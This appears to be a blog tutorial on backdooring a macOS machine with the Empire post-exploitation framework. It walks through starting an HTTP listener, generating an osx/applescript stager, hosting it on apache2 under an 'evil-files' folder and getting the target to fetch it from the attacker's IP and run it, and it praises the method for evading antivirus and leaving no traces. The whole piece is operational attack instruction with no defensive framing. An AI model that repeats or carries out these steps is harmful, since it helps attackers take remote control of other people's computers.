In this article, I will be showing you how to hack an Apple Computer using an empire stager.
There are various stagers that can be used with empire but in this article I want to focus on OSX/applescript.
What is Empire?
Empire is a post-exploitation framework that includes a pure-PowerShell Windows agent and Linux/OSX agents.
Empire gives us the ability to run commands in memory which reduces the chances of getting caught by any antivirus software or leaving any digital fingerprints.
How to Install Empire?
1. Clone the repo from github
2. Navigate to the setup directory
3. Execute the install.sh file
How to Run Empire?
1. Navigate to the main directory of empire
2. Run it as follows:
Note: You can use the ‘help’ command within empire to list all the commands that can be used.
Listening For Incoming Connections:
1. To open the listeners management menu, We can use the ‘listeners’ command.
2. Now that we are inside the listeners management menu, we can type ‘uselistener’, press <space> and hit the <tab> button twice to list all the types of listeners that can be used.
uselistener + <space> + <tab> <tab>
3. For our example, we will be using an http listener so we can just type ‘http’ and hit <enter>.
4. We can use the ‘info’ command to see the options that can be used with the listener.
5. The options that we are interested in here are : Name, Host, Port
set Name http_listener1 set Port 8080
6. Once done with the options, we can use the ‘execute’ command to start our listener.
Generating an OSX Stager:
1. To list all the available stagers, we can type ‘usestager’, press <space> and hit the <tab> button twice.
usestager + <space> + <tab> <tab>
2. For our example, we will be using ‘osx/applescript’ so we can just type ‘osx/applescript’ and hit <enter>.
3. We can use the ‘info’ command to see the options that can be used with the stager.
4. The options that we are interested in here are : Listener, OutFile
set listener http_listener1 set OutFile /tmp/applescript
5. Once done, we can use the ‘execute’ to generate our stager.
We can now proceed to send the above generated stager to our target. As a rule of thumb, we are going to use a very basic delivery method to test the backdoor just to make sure that it works.
Delivering Our Backdoor:
1. To deliver our backdoor, we will use apache2 which is a webserver that comes in pre-installed with kali. All we have to do is copy and paste our backdoor to /var/www/html/evil-files
cp /tmp/applescript /var/www/html/evil-files
2. We can start our webserver by using the following command:
service apache2 start
3. Now let’s go to the OSX machine and see if we can access the backdoor through our web browser. All we have to do is browse to http://[Attacker’s IP]/evil-files and select applescript to view the content of the file.
Once done with all of the above, we can now copy and paste the content to script editor and then run it from there by clicking on the start button.
We can also export the script as an application by clicking on file and then export.
As soon as the backdoor is executed on our target, a new agent will appear within empire.
Now we can interact with our target as shown below:
I hope you find it useful 🙂